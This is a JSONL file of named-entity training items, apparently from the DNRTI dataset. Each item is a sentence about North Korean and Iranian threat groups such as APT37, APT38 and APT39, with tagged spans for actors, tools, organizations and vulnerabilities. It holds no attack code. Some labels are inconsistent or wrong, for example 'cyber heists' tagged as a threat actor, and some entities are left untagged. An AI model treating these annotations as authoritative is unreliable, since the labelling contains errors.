{"text": "APT37 has likely been active since at least 2012 and focuses on targeting the public and private sectors primarily in South Korea .", "spans": {"THREAT_ACTOR: APT37": [[0, 5]]}, "info": {"id": "dnrti_train_000205", "source": "dnrti_train"}}
{"text": "In 2017 , APT37 expanded its targeting beyond the Korean peninsula to include Japan , Vietnam and the Middle East , and to a wider range of industry verticals , including chemicals , electronics , manufacturing , aerospace , automotive and healthcare entities .", "spans": {"THREAT_ACTOR: APT37": [[10, 15]], "ORGANIZATION: healthcare entities": [[240, 259]]}, "info": {"id": "dnrti_train_000206", "source": "dnrti_train"}}
{"text": "In 2017 , APT37 targeted a company in Middle East that entered into a joint venture with the North Korean government to provide telecommunications service to the country .", "spans": {"THREAT_ACTOR: APT37": [[10, 15]]}, "info": {"id": "dnrti_train_000207", "source": "dnrti_train"}}
{"text": "While not conclusive by itself , the use of publicly available Iranian hacking tools and popular Iranian hosting companies may be a result of APT33 's familiarity with them and lends support to the assessment that APT33 may be based in Iran .", "spans": {"ORGANIZATION: hosting companies": [[105, 122]], "THREAT_ACTOR: APT33": [[142, 147], [214, 219]]}, "info": {"id": "dnrti_train_000208", "source": "dnrti_train"}}
{"text": "North Korean defector and human rights-related targeting provides further evidence that APT37 conducts operations aligned with the interests of North Korea .", "spans": {"THREAT_ACTOR: APT37": [[88, 93]]}, "info": {"id": "dnrti_train_000209", "source": "dnrti_train"}}
{"text": "In 2017 , APT37 targeted a Middle Eastern company that entered into a joint venture with the North Korean government to provide telecommunications service to the country ( read on for a case study ) .", "spans": {"THREAT_ACTOR: APT37": [[10, 15]], "ORGANIZATION: company": [[42, 49]]}, "info": {"id": "dnrti_train_000210", "source": "dnrti_train"}}
{"text": "APT37 targeted a research fellow , advisory member , and journalist associated with different North Korean human rights issues and strategic organizations .", "spans": {"THREAT_ACTOR: APT37": [[0, 5]], "ORGANIZATION: research fellow": [[17, 32]], "ORGANIZATION: advisory member": [[35, 50]], "ORGANIZATION: journalist": [[57, 67]], "ORGANIZATION: strategic organizations": [[131, 154]]}, "info": {"id": "dnrti_train_000211", "source": "dnrti_train"}}
{"text": "APT37 distributed SLOWDRIFT malware using a lure referencing the Korea Global Forum against academic and strategic institutions located in South Korea .", "spans": {"THREAT_ACTOR: APT37": [[0, 5]], "TOOL: SLOWDRIFT malware": [[18, 35]], "ORGANIZATION: academic": [[92, 100]], "ORGANIZATION: strategic institutions": [[105, 127]]}, "info": {"id": "dnrti_train_000212", "source": "dnrti_train"}}
{"text": "We believe a organization located in Middle East was targeted by APT37 because it had been involved with a North Korean company and a business deal went bad .", "spans": {"THREAT_ACTOR: APT37": [[65, 70]], "ORGANIZATION: company": [[120, 127]]}, "info": {"id": "dnrti_train_000213", "source": "dnrti_train"}}
{"text": "In one instance , APT37 weaponized a video downloader application with KARAE malware that was indiscriminately distributed to South Korean victims through torrent websites .", "spans": {"THREAT_ACTOR: APT37": [[18, 23]], "TOOL: KARAE malware": [[71, 84]]}, "info": {"id": "dnrti_train_000214", "source": "dnrti_train"}}
{"text": "FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT37": [[54, 59]], "VULNERABILITY: zero-day Adobe Flash vulnerability": [[72, 106]], "VULNERABILITY: CVE-2018-4878": [[109, 122]], "TOOL: DOGCALL malware": [[139, 154]]}, "info": {"id": "dnrti_train_000215", "source": "dnrti_train"}}
{"text": "FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": {"ORGANIZATION: FireEye iSIGHT Intelligence": [[0, 27]], "THREAT_ACTOR: APT37": [[74, 79]], "VULNERABILITY: zero-day Adobe Flash vulnerability": [[92, 126]], "VULNERABILITY: CVE-2018-4878": [[129, 142]], "TOOL: DOGCALL malware": [[159, 174]]}, "info": {"id": "dnrti_train_000216", "source": "dnrti_train"}}
{"text": "In April 2017 , APT37 targeted South Korean military and government organizations with the DOGCALL backdoor and RUHAPPY wiper malware .", "spans": {"THREAT_ACTOR: APT37": [[16, 21]], "ORGANIZATION: military": [[44, 52]], "ORGANIZATION: government organizations": [[57, 81]], "TOOL: DOGCALL backdoor": [[91, 107]], "TOOL: RUHAPPY wiper malware": [[112, 133]]}, "info": {"id": "dnrti_train_000217", "source": "dnrti_train"}}
{"text": "It is possible that APT37 's distribution of KARAE malware via torrent websites could assist in creating and maintaining botnets for future distributed denial-of-service ( DDoS ) attacks , or for other activity such as financially motivated campaigns or disruptive operations .", "spans": {"THREAT_ACTOR: APT37": [[20, 25]], "TOOL: KARAE malware": [[45, 58]]}, "info": {"id": "dnrti_train_000218", "source": "dnrti_train"}}
{"text": "We assess with high confidence that APT37 acts in support of the North Korean government and is primarily based in North Korea .", "spans": {"THREAT_ACTOR: APT37": [[36, 41]]}, "info": {"id": "dnrti_train_000219", "source": "dnrti_train"}}
{"text": "The compilation times of APT37 malware is consistent with a developer operating in the North Korea time zone ( UTC +8:30 ) and follows what is believed to be a typical North Korean workday .", "spans": {"TOOL: APT37 malware": [[25, 38]]}, "info": {"id": "dnrti_train_000220", "source": "dnrti_train"}}
{"text": "The majority of APT37 activity continues to target South Korea , North Korean defectors , and organizations and individuals involved in Korean Peninsula reunification efforts .", "spans": {"ORGANIZATION: defectors": [[78, 87]]}, "info": {"id": "dnrti_train_000221", "source": "dnrti_train"}}
{"text": "Similarly , APT37 targeting of a company located in Middle East in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea .", "spans": {"THREAT_ACTOR: APT37": [[12, 17]]}, "info": {"id": "dnrti_train_000222", "source": "dnrti_train"}}
{"text": "Similarly , APT37 targeting of a Middle Eastern company in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea .", "spans": {"THREAT_ACTOR: APT37": [[12, 17]], "ORGANIZATION: company": [[48, 55]]}, "info": {"id": "dnrti_train_000223", "source": "dnrti_train"}}
{"text": "In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company .", "spans": {"THREAT_ACTOR: APT37": [[14, 19]], "ORGANIZATION: board member": [[86, 98]], "ORGANIZATION: financial company": [[119, 136]]}, "info": {"id": "dnrti_train_000224", "source": "dnrti_train"}}
{"text": "Though they have primarily tapped other tracked suspected North Korean teams to carry out the most aggressive actions , APT37 is an additional tool available to the regime , perhaps even desirable for its relative obscurity .", "spans": {"THREAT_ACTOR: APT37": [[120, 125]]}, "info": {"id": "dnrti_train_000225", "source": "dnrti_train"}}
{"text": "ScarCruft is a relatively new APT group , victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]], "THREAT_ACTOR: APT group": [[30, 39]]}, "info": {"id": "dnrti_train_000226", "source": "dnrti_train"}}
{"text": "Certain details , such as using the same infrastructure and targeting , make us believe that Operation Daybreak is being done by the ScarCruft APT group .", "spans": {"THREAT_ACTOR: ScarCruft": [[133, 142]], "THREAT_ACTOR: APT group": [[143, 152]]}, "info": {"id": "dnrti_train_000227", "source": "dnrti_train"}}
{"text": "Prior to the discovery of Operation Daybreak , we observed the ScarCruft APT launching a series of attacks in Operation Erebus .", "spans": {"THREAT_ACTOR: ScarCruft APT": [[63, 76]]}, "info": {"id": "dnrti_train_000228", "source": "dnrti_train"}}
{"text": "Operation Daybreak appears to have been launched by unknown attackers to infect high profile targets through spear-phishing e-mails .", "spans": {"THREAT_ACTOR: attackers": [[60, 69]]}, "info": {"id": "dnrti_train_000229", "source": "dnrti_train"}}
{"text": "Operation Daybreak appears to have been launched by APT37 to infect high profile targets through spear-phishing e-mails .", "spans": {"THREAT_ACTOR: APT37": [[52, 57]]}, "info": {"id": "dnrti_train_000230", "source": "dnrti_train"}}
{"text": "On occasion the APT37 directly included the ROKRAT payload in the malicious document and during other campaigns the attackers leveraged multi-stage infection processes .", "spans": {"THREAT_ACTOR: APT37": [[16, 21]], "TOOL: ROKRAT": [[44, 50]], "THREAT_ACTOR: attackers": [[116, 125]]}, "info": {"id": "dnrti_train_000231", "source": "dnrti_train"}}
{"text": "In the early part of 2017 , Group123 started the \" Evil New Year \" campaign .", "spans": {"THREAT_ACTOR: Group123": [[28, 36]]}, "info": {"id": "dnrti_train_000232", "source": "dnrti_train"}}
{"text": "In November 2017 , Talos observed the latest Group123 campaign of the year , which included a new version of ROKRAT being used in the latest wave of attacks .", "spans": {"ORGANIZATION: Talos": [[19, 24]], "TOOL: ROKRAT": [[109, 115]]}, "info": {"id": "dnrti_train_000233", "source": "dnrti_train"}}
{"text": "Group123 is constantly evolving as the new fileless capability that was added to ROKRAT demonstrates .", "spans": {"THREAT_ACTOR: Group123": [[0, 8]], "TOOL: ROKRAT": [[81, 87]]}, "info": {"id": "dnrti_train_000234", "source": "dnrti_train"}}
{"text": "In this campaign , the Group123 used a classical HWP document in order to download and execute a previously unknown malware : NavRAT .", "spans": {"THREAT_ACTOR: Group123": [[23, 31]], "TOOL: HWP document": [[49, 61]], "TOOL: NavRAT": [[126, 132]]}, "info": {"id": "dnrti_train_000235", "source": "dnrti_train"}}
{"text": "However , we asses with medium confidence that NavRAT is linked to Group123 .", "spans": {"TOOL: NavRAT": [[47, 53]], "THREAT_ACTOR: Group123": [[67, 75]]}, "info": {"id": "dnrti_train_000236", "source": "dnrti_train"}}
{"text": "APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world 's largest cyber heists .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "THREAT_ACTOR: regime-backed group": [[46, 65]], "ORGANIZATION: financial institutions": [[121, 143]], "THREAT_ACTOR: cyber heists": [[186, 198]]}, "info": {"id": "dnrti_train_000237", "source": "dnrti_train"}}
{"text": "APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "THREAT_ACTOR: regime-backed group": [[46, 65]], "ORGANIZATION: financial institutions": [[121, 143]]}, "info": {"id": "dnrti_train_000238", "source": "dnrti_train"}}
{"text": "APT38 is believed to operate more similarly to an espionage operation , carefully conducting reconnaissance within compromised financial institutions and balancing financially motivated objectives with learning about internal systems .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "ORGANIZATION: financial institutions": [[127, 149]]}, "info": {"id": "dnrti_train_000239", "source": "dnrti_train"}}
{"text": "The group has compromised more than 16 organizations in at least 13 different countries , sometimes simultaneously , since at least 2014 .", "spans": {"THREAT_ACTOR: group": [[4, 9]]}, "info": {"id": "dnrti_train_000240", "source": "dnrti_train"}}
{"text": "APT38 shares malware code and other development resources with TEMP.Hermit North Korean cyber espionage activity , although we consider APT38 .", "spans": {"THREAT_ACTOR: APT38": [[0, 5], [136, 141]], "THREAT_ACTOR: TEMP.Hermit": [[63, 74]]}, "info": {"id": "dnrti_train_000241", "source": "dnrti_train"}}
{"text": "We consider APT38 's operations more global and highly specialized for targeting the financial sector .", "spans": {"THREAT_ACTOR: APT38": [[12, 17]], "ORGANIZATION: financial sector": [[85, 101]]}, "info": {"id": "dnrti_train_000242", "source": "dnrti_train"}}
{"text": "APT38 is a financially motivated group linked to North Korean cyber espionage operators , renown for attempting to steal hundreds of millions of dollars from financial institutions and their brazen use of destructive malware .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "THREAT_ACTOR: group": [[33, 38]], "THREAT_ACTOR: cyber espionage operators": [[62, 87]], "ORGANIZATION: financial institutions": [[158, 180]]}, "info": {"id": "dnrti_train_000243", "source": "dnrti_train"}}
{"text": "Because APT38 is backed by ( and acts on behalf of ) the North Korean regime , we opted to categorize the group as an \" APT \" instead of a \" FIN \" .", "spans": {"THREAT_ACTOR: APT38": [[8, 13]], "THREAT_ACTOR: group": [[106, 111]], "THREAT_ACTOR: APT": [[120, 123]]}, "info": {"id": "dnrti_train_000244", "source": "dnrti_train"}}
{"text": "Over time these malware similarities diverged , as did targeting , intended outcomes , and TTPs , almost certainly indicating that TEMP.Hermit activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship .", "spans": {"THREAT_ACTOR: operational groups": [[175, 193]]}, "info": {"id": "dnrti_train_000245", "source": "dnrti_train"}}
{"text": "Based on observed activity , we judge that APT38 's primary mission is targeting financial institutions and manipulating inter-bank financial systems to raise large sums of money for the North Korean regime .", "spans": {"THREAT_ACTOR: APT38": [[43, 48]], "ORGANIZATION: financial institutions": [[81, 103]]}, "info": {"id": "dnrti_train_000246", "source": "dnrti_train"}}
{"text": "Since 2015 , APT38 has attempted to steal hundreds of millions of dollars from financial institutions .", "spans": {"THREAT_ACTOR: APT38": [[13, 18]], "ORGANIZATION: financial institutions": [[79, 101]]}, "info": {"id": "dnrti_train_000247", "source": "dnrti_train"}}
{"text": "APT38 has pursued their main objective of targeting banks and financial entities since at least 2014 .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "ORGANIZATION: financial entities": [[62, 80]]}, "info": {"id": "dnrti_train_000248", "source": "dnrti_train"}}
{"text": "We surmise that the targeting of banks , media , and government agencies is conducted in support of APT38 's primary mission .", "spans": {"ORGANIZATION: government agencies": [[53, 72]], "THREAT_ACTOR: APT38": [[100, 105]]}, "info": {"id": "dnrti_train_000249", "source": "dnrti_train"}}
{"text": "The APT38 targeted news outlets known for their business and financial sector reporting , probably in support of efforts to identify and compromise additional financial institutions .", "spans": {"THREAT_ACTOR: APT38": [[4, 9]], "ORGANIZATION: financial sector": [[61, 77]], "ORGANIZATION: financial institutions": [[159, 181]]}, "info": {"id": "dnrti_train_000250", "source": "dnrti_train"}}
{"text": "APT38 also targeted financial transaction exchange companies likely because of their proximity to banks .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "ORGANIZATION: financial transaction exchange companies": [[20, 60]]}, "info": {"id": "dnrti_train_000251", "source": "dnrti_train"}}
{"text": "Given the lapse in time between the spear-phishing and the heist activity in the above example , we suggest two separate but related groups under the North Korean regime were responsible for carrying out missions ; one associated with reconnaissance ( TEMP.Hermit or a related group ) and another for the heists ( APT38 ) .", "spans": {"THREAT_ACTOR: groups": [[133, 139]], "THREAT_ACTOR: TEMP.Hermit": [[252, 263]], "THREAT_ACTOR: group": [[277, 282]], "THREAT_ACTOR: APT38": [[314, 319]]}, "info": {"id": "dnrti_train_000252", "source": "dnrti_train"}}
{"text": "APT38 , in particular , is strongly distinguishable because of its specific focus on financial institutions and operations that attempt to use SWIFT fraud to steal millions of dollars at a time .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "ORGANIZATION: financial institutions": [[85, 107]], "TOOL: SWIFT": [[143, 148]]}, "info": {"id": "dnrti_train_000253", "source": "dnrti_train"}}
{"text": "We can confirm that the APT38 operator activity is linked to the North Korean regime , but maintains a set of common characteristics , including motivation , malware , targeting , and TTPs that set it apart from other statesponsored operations .", "spans": {}, "info": {"id": "dnrti_train_000254", "source": "dnrti_train"}}
{"text": "As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions to raise money for the North Korean regime .", "spans": {"THREAT_ACTOR: APT38": [[62, 67]], "ORGANIZATION: financial institutions": [[103, 125]]}, "info": {"id": "dnrti_train_000255", "source": "dnrti_train"}}
{"text": "As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions and financial systems to raise money for the North Korean regime .", "spans": {"THREAT_ACTOR: APT38": [[62, 67]], "ORGANIZATION: financial institutions": [[103, 125]]}, "info": {"id": "dnrti_train_000256", "source": "dnrti_train"}}
{"text": "Although the APT38 's primary targets appear to be Financial Exchange banks and other financial organizations , they have also Financial Exchange targeted countries ' media organizations with a focus on the financial sector .", "spans": {"THREAT_ACTOR: APT38": [[13, 18]], "ORGANIZATION: Financial Exchange banks": [[51, 75]], "ORGANIZATION: financial organizations": [[86, 109]], "ORGANIZATION: media organizations": [[167, 186]], "ORGANIZATION: financial sector": [[207, 223]]}, "info": {"id": "dnrti_train_000257", "source": "dnrti_train"}}
{"text": "Since at least the beginning of 2014 , APT38 operations have focused almost exclusively on developing and conducting financially motivated campaigns targeting international entities , whereas TEMP.Hermit is generally linked to operations focused on South Korea and the United States .", "spans": {"THREAT_ACTOR: APT38": [[39, 44]], "ORGANIZATION: international entities": [[159, 181]], "THREAT_ACTOR: TEMP.Hermit": [[192, 203]]}, "info": {"id": "dnrti_train_000258", "source": "dnrti_train"}}
{"text": "TEMP.Hermit is generally linked to operations focused on South Korea and the United States .", "spans": {"THREAT_ACTOR: TEMP.Hermit": [[0, 11]]}, "info": {"id": "dnrti_train_000259", "source": "dnrti_train"}}
{"text": "While North Korean cyber operations against specific countries may have been driven by diplomatic factors and perceived insults against Pyongyang , the application of increasingly restrictive and numerous financial sanctions against North Korea probably contributed to the formation of APT38 .", "spans": {"THREAT_ACTOR: APT38": [[286, 291]]}, "info": {"id": "dnrti_train_000260", "source": "dnrti_train"}}
{"text": "APT38 's operations began in February 2014 and were likely influenced by financial sanctions enacted in March 2013 that blocked bulk cash transfers and restricted North Korea 's access to international banking systems .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]]}, "info": {"id": "dnrti_train_000261", "source": "dnrti_train"}}
{"text": "APT37 ( Reaper ) , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud .", "spans": {"THREAT_ACTOR: APT37": [[0, 5]], "THREAT_ACTOR: Reaper": [[8, 14]], "THREAT_ACTOR: state-sponsored group": [[40, 61]], "ORGANIZATION: financial company": [[90, 107]]}, "info": {"id": "dnrti_train_000262", "source": "dnrti_train"}}
{"text": "APT37 , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud .", "spans": {"THREAT_ACTOR: APT37": [[0, 5]], "THREAT_ACTOR: state-sponsored group": [[29, 50]], "ORGANIZATION: financial company": [[79, 96]]}, "info": {"id": "dnrti_train_000263", "source": "dnrti_train"}}
{"text": "Early APT38 operations suggest that the group began targeting financial institutions with an intent to manipulate financial transaction systems at least as early as February 2014 , although we did not observe fraudulent transactions until 2015 .", "spans": {"THREAT_ACTOR: APT38": [[6, 11]], "THREAT_ACTOR: group": [[40, 45]], "ORGANIZATION: financial institutions": [[62, 84]]}, "info": {"id": "dnrti_train_000264", "source": "dnrti_train"}}
{"text": "We do not have evidence that the earliest targeted financial institutions were victimized by fraudulent transactions before APT38 left the compromised environments , possibly indicating that APT38 was conducting reconnaissance-only activity at that time .", "spans": {"ORGANIZATION: financial institutions": [[51, 73]], "THREAT_ACTOR: APT38": [[124, 129], [191, 196]]}, "info": {"id": "dnrti_train_000265", "source": "dnrti_train"}}
{"text": "In early 2014 , the APT38 deployed NESTEGG ( a backdoor ) and KEYLIME ( a keylogger ) malware designed to impact financial institution-specific systems at a Southeast Asian bank .", "spans": {"THREAT_ACTOR: APT38": [[20, 25]], "TOOL: NESTEGG": [[35, 42]], "TOOL: KEYLIME": [[62, 69]], "TOOL: keylogger": [[74, 83]]}, "info": {"id": "dnrti_train_000266", "source": "dnrti_train"}}
{"text": "From November 2015 through the end of 2016 , APT38 was involved in at least nine separate compromises against banks .", "spans": {"THREAT_ACTOR: APT38": [[45, 50]]}, "info": {"id": "dnrti_train_000268", "source": "dnrti_train"}}
{"text": "Per the complaint , the email account watsonhenny@gmail.com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 .", "spans": {"ORGANIZATION: employees": [[101, 110]], "THREAT_ACTOR: APT38": [[139, 144]]}, "info": {"id": "dnrti_train_000269", "source": "dnrti_train"}}
{"text": "Further , the recent DOJ complaint provides insight into initial compromise techniques conducted by North Korean operators against APT38 targets , which may have been leveraged as part of the initial compromise into the targeted organizations .", "spans": {"THREAT_ACTOR: operators": [[113, 122]], "THREAT_ACTOR: APT38": [[131, 136]]}, "info": {"id": "dnrti_train_000270", "source": "dnrti_train"}}
{"text": "This is corroborated by our identification of TEMP.Hermit 's use of MACKTRUCK at a bank , preceding the APT38 operation targeting the bank 's SWIFT systems in late 2015 .", "spans": {"THREAT_ACTOR: TEMP.Hermit": [[46, 57]], "TOOL: MACKTRUCK": [[68, 77]], "THREAT_ACTOR: APT38": [[104, 109]]}, "info": {"id": "dnrti_train_000271", "source": "dnrti_train"}}
{"text": "APT38 relies on DYEPACK , a SWIFT transaction-hijacking framework , to initiate transactions , steal money , and hide any evidence of the fraudulent transactions from the victimized bank .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "TOOL: DYEPACK": [[16, 23]]}, "info": {"id": "dnrti_train_000272", "source": "dnrti_train"}}
{"text": "The APT38 uses DYEPACK to manipulate the SWIFT transaction records and hide evidence of the malicious transactions , so bank personnel are none the wiser when they review recent transactions .", "spans": {"THREAT_ACTOR: APT38": [[4, 9]], "TOOL: DYEPACK": [[15, 22]], "ORGANIZATION: bank personnel": [[120, 134]]}, "info": {"id": "dnrti_train_000273", "source": "dnrti_train"}}
{"text": "During this heist , APT38 waited for a holiday weekend in the respective countries to increase the likelihood of hiding the transactions from banking authorities .", "spans": {"THREAT_ACTOR: APT38": [[20, 25]]}, "info": {"id": "dnrti_train_000274", "source": "dnrti_train"}}
{"text": "During one reported incident , APT38 caused an outage in the bank 's essential services .", "spans": {"THREAT_ACTOR: APT38": [[31, 36]]}, "info": {"id": "dnrti_train_000275", "source": "dnrti_train"}}
{"text": "We attribute APT38 to North Korean state-sponsored operators based on a combination of technical indicators linking the activity to Pyongyang and details released by DOJ implicating North Korean national Park Jin Hyok in a criminal conspiracy .", "spans": {"THREAT_ACTOR: APT38": [[13, 18]], "THREAT_ACTOR: operators": [[51, 60]]}, "info": {"id": "dnrti_train_000276", "source": "dnrti_train"}}
{"text": "As detailed in the DOJ complaint , a sample of WHITEOUT malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank .", "spans": {"TOOL: WHITEOUT malware": [[47, 63]], "THREAT_ACTOR: APT38": [[80, 85]]}, "info": {"id": "dnrti_train_000277", "source": "dnrti_train"}}
{"text": "APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "ORGANIZATION: financial institutions": [[67, 89]]}, "info": {"id": "dnrti_train_000278", "source": "dnrti_train"}}
{"text": "Malware overlaps between APT38 and TEMP.Hermit highlight the shared development resources accessible by multiple operational groups linked to North Korean state-sponsored activity .", "spans": {"THREAT_ACTOR: APT38": [[25, 30]], "THREAT_ACTOR: TEMP.Hermit": [[35, 46]], "THREAT_ACTOR: operational groups": [[113, 131]]}, "info": {"id": "dnrti_train_000281", "source": "dnrti_train"}}
{"text": "APT39 has prioritized the telecommunications sector , with additional targeting of the travel industry and IT firms that support it and the high-tech industry .", "spans": {"THREAT_ACTOR: APT39": [[0, 5]], "ORGANIZATION: telecommunications sector": [[26, 51]], "ORGANIZATION: IT firms": [[107, 115]]}, "info": {"id": "dnrti_train_000282", "source": "dnrti_train"}}
{"text": "This is evidence of shared motivation and intent to target the SWIFT system by the North Korean operators performing the reconnaissance and APT38 which later targeted that organization .", "spans": {"THREAT_ACTOR: operators": [[96, 105]], "THREAT_ACTOR: APT38": [[140, 145]]}, "info": {"id": "dnrti_train_000283", "source": "dnrti_train"}}
{"text": "Although APT38 is distinct from other TEMP.Hermit activity , both groups operate consistently within the interests of the North Korean state .", "spans": {"THREAT_ACTOR: APT38": [[9, 14]], "THREAT_ACTOR: groups": [[66, 72]]}, "info": {"id": "dnrti_train_000284", "source": "dnrti_train"}}
{"text": "Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea .", "spans": {"THREAT_ACTOR: APT38": [[109, 114]], "THREAT_ACTOR: cyber operators": [[125, 140]], "THREAT_ACTOR: TEMP.Hermit": [[151, 162]], "ORGANIZATION: Lab 110": [[183, 190]]}, "info": {"id": "dnrti_train_000285", "source": "dnrti_train"}}
{"text": "As detailed in the DOJ complaint , a sample of WHITEOUT ( aka Contopee ) malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank .", "spans": {"TOOL: WHITEOUT": [[47, 55]], "TOOL: Contopee": [[62, 70]], "THREAT_ACTOR: APT38": [[97, 102]]}, "info": {"id": "dnrti_train_000286", "source": "dnrti_train"}}
{"text": "Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea 's Reconnaissance General Bureau ( RGB ) .", "spans": {"THREAT_ACTOR: APT38": [[109, 114]], "THREAT_ACTOR: cyber operators": [[125, 140]], "THREAT_ACTOR: TEMP.Hermit": [[151, 162]], "ORGANIZATION: Lab 110": [[183, 190]]}, "info": {"id": "dnrti_train_000287", "source": "dnrti_train"}}
{"text": "APT38 's targeting of financial institutions is most likely an effort by the North Korean government to supplement their heavily-sanctioned economy .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "ORGANIZATION: financial institutions": [[22, 44]]}, "info": {"id": "dnrti_train_000290", "source": "dnrti_train"}}
{"text": "We have moderate confidence APT39 operations are conducted in support of Iranian national interests based on regional targeting patterns focused in the Middle East .", "spans": {"THREAT_ACTOR: APT39": [[28, 33]]}, "info": {"id": "dnrti_train_000291", "source": "dnrti_train"}}
{"text": "APT39 's focus on the widespread theft of personal information sets it apart from other Iranian groups FireEye tracks , which have been linked to influence operations , disruptive attacks , and other threats .", "spans": {"THREAT_ACTOR: APT39": [[0, 5]], "THREAT_ACTOR: groups": [[96, 102]], "ORGANIZATION: FireEye": [[103, 110]]}, "info": {"id": "dnrti_train_000292", "source": "dnrti_train"}}
{"text": "APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns .", "spans": {"THREAT_ACTOR: APT39": [[0, 5]], "ORGANIZATION: specific individuals": [[149, 169]]}, "info": {"id": "dnrti_train_000293", "source": "dnrti_train"}}
{"text": "Other groups attributed to Iranian attackers , such as Rocket Kitten , have targeted Iranian individuals in the past , including anonymous proxy users , researchers , journalists , and dissidents .", "spans": {"THREAT_ACTOR: groups": [[6, 12]], "THREAT_ACTOR: attackers": [[35, 44]], "THREAT_ACTOR: Rocket Kitten": [[55, 68]], "ORGANIZATION: anonymous proxy users": [[129, 150]], "ORGANIZATION: researchers": [[153, 164]], "ORGANIZATION: journalists": [[167, 178]], "ORGANIZATION: dissidents": [[185, 195]]}, "info": {"id": "dnrti_train_000294", "source": "dnrti_train"}}
{"text": "Remexi is a basic back door Trojan that allows Cadelle to open a remote shell on the computer and execute commands .", "spans": {"TOOL: Remexi": [[0, 6]], "THREAT_ACTOR: Cadelle": [[47, 54]]}, "info": {"id": "dnrti_train_000295", "source": "dnrti_train"}}
{"text": "Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands .", "spans": {"TOOL: Remexi": [[0, 6]], "THREAT_ACTOR: attackers": [[47, 56]]}, "info": {"id": "dnrti_train_000296", "source": "dnrti_train"}}
{"text": "One group , which we call Cadelle , uses Backdoor.Cadelspy , while the other , which we've named Chafer , uses Backdoor.Remexi and Backdoor.Remexi.B .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "THREAT_ACTOR: Cadelle": [[26, 33]], "TOOL: Backdoor.Cadelspy": [[41, 58]], "THREAT_ACTOR: Chafer": [[97, 103]], "TOOL: Backdoor.Remexi": [[111, 126]], "TOOL: Backdoor.Remexi.B": [[131, 148]]}, "info": {"id": "dnrti_train_000297", "source": "dnrti_train"}}
{"text": "APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol ( RDP ) , Secure Shell ( SSH ) , PsExec , RemCom , and xCmdSvc .", "spans": {"THREAT_ACTOR: APT39": [[0, 5]], "TOOL: Remote Desktop Protocol": [[64, 87]], "TOOL: RDP": [[90, 93]], "TOOL: Secure Shell": [[98, 110]], "TOOL: SSH": [[113, 116]], "TOOL: PsExec": [[121, 127]], "TOOL: RemCom": [[130, 136]], "TOOL: xCmdSvc": [[143, 150]]}, "info": {"id": "dnrti_train_000298", "source": "dnrti_train"}}
{"text": "The APT39 were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation .", "spans": {"THREAT_ACTOR: APT39": [[4, 9]]}, "info": {"id": "dnrti_train_000299", "source": "dnrti_train"}}
{"text": "A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": {"THREAT_ACTOR: group": [[30, 35]], "THREAT_ACTOR: hackers": [[54, 61]], "VULNERABILITY: zero-day exploit": [[105, 121]], "THREAT_ACTOR: Gamma Group": [[247, 258]]}, "info": {"id": "dnrti_train_000300", "source": "dnrti_train"}}
{"text": "A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": {"THREAT_ACTOR: BlackOasis group": [[30, 46]], "THREAT_ACTOR: hackers": [[65, 72]], "VULNERABILITY: zero-day exploit": [[116, 132]], "THREAT_ACTOR: Gamma Group": [[258, 269]]}, "info": {"id": "dnrti_train_000301", "source": "dnrti_train"}}
